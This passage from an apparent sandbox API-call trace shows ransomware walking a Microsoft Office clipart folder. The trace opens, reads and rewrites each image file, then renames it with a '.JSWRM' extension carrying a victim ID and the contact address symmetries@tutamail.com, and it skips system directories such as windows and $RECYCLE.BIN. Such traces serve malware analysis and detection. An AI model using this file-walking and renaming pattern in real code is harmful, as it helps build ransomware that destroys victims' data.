(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.842] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.842] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.842] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.851] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.852] CloseHandle (hObject=0x314) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0093.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0093.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02039U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02039u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0093.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.853] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02040U.BMP", cAlternateFileName="")) returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2=".") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="..") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="...") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="windows") returned -1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="recovery") returned -1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="perflogs") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="documents and settings") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="system volume information") returned -1 [0093.853] lstrcmpiW (lpString1="PH02040U.BMP", lpString2="msocache") returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02040U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02040U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02040U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02040U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02040U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02040U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.855] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0093.855] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0093.856] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0093.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.860] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0093.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.861] CloseHandle (hObject=0x314) returned 1 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0093.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0093.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0093.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02040U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02040u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0093.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.862] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6afc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02053J.JPG", cAlternateFileName="")) returned 1 [0093.862] lstrcmpiW (lpString1="PH02053J.JPG", lpString2=".") returned 1 [0093.862] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="..") returned 1 [0093.862] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="...") returned 1 [0093.862] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="windows") returned -1 [0093.862] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="recovery") returned -1 [0093.863] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="perflogs") returned 1 [0093.863] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="documents and settings") returned 1 [0093.863] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.863] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="system volume information") returned -1 [0093.863] lstrcmpiW (lpString1="PH02053J.JPG", lpString2="msocache") returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02053J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02053J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02053J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02053J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02053J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02053J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.863] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27388) returned 1 [0093.863] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6af0) returned 0x24d210 [0093.864] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6af0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6af0, lpOverlapped=0x0) returned 1 [0093.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.870] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6af0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6af0, lpOverlapped=0x0) returned 1 [0093.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.894] CloseHandle (hObject=0x314) returned 1 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0093.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0093.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0093.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02053J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02053j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.895] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02058U.BMP", cAlternateFileName="")) returned 1 [0093.895] lstrcmpiW (lpString1="PH02058U.BMP", lpString2=".") returned 1 [0093.895] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="..") returned 1 [0093.895] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="...") returned 1 [0093.895] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="windows") returned -1 [0093.895] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="recovery") returned -1 [0093.896] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="perflogs") returned 1 [0093.896] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="documents and settings") returned 1 [0093.896] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.896] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="system volume information") returned -1 [0093.896] lstrcmpiW (lpString1="PH02058U.BMP", lpString2="msocache") returned 1 [0093.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02058U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02058U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02058U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02058U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02058U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02058U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.897] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.897] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.897] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.912] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 